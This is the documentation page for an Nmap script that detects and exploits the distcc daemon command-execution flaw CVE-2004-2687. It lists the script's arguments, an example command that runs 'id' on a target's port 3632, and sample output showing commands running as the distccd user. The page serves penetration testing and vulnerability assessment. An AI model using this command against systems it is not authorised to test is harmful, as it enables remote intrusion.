Script distcc-cve2004-2687

Script types: portrule
Categories: exploit, intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse

Script Summary

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.

Script Arguments

cmd

the command to run at the remote server

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Script Output

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|     Description:
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|     References:
|       https://distcc.github.io/security.html
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Requires

• nmap
• match
• shortport
• stdnse
• vulns

---

Author:

• Patrik Karlsson

License: Same as Nmap--See https://nmap.org/book/man-legal.html